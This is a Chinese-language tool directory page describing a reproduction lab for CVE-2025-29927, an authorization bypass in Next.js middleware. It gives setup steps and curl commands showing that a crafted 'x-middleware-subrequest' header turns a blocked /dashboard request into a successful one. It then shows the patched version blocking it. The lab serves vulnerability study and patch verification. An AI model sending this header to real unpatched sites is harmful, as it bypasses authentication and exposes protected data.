Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-29927-lab — 复现实验室 for CVE-2025-29927 — Next.js 中间件授权绕过 (CVSS 9.1) | Kitploit
工具/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
漏洞分析Web应用程序漏洞利用渗透测试身份验证学习与教育实验室与实践
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

复现实验室 for CVE-2025-29927 — Next.js 中间件授权绕过 (CVSS 9.1)

查看仓库
423个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-29927 实验室

用于 CVE-2025-29927 的最小复现实验室 — Next.js 中间件授权绕过 (CVSS 9.1)。

配套文章:关于 Medium 的 N-Day 分析

这是什么

一个使用 Next.js 15.2.2(存在漏洞)的应用,具有基于 cookie 保护的 /dashboard 路由。中间件身份验证检查可以通过发送单个 HTTP 头来绕过——无需凭证。

要求

  • Node.js 18+

设置

root@kitploit:~
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

复现绕过

第 1 步 — 确认中间件阻止未认证请求:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

第 2 步 — 使用子请求标头绕过中间件:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

第 3 步 — 升级到已修复版本并确认绕过已被阻止:

root@kitploit:~
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

应用路由

路由访问权限
/公开
/login公开
/dashboard受中间件保护(需要 session cookie)

受影响版本

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

参考资料

  • NVD — CVE-2025-29927
  • Next.js 补丁 PR #77201
  • 漏洞源代码 — sandbox.ts
下载工具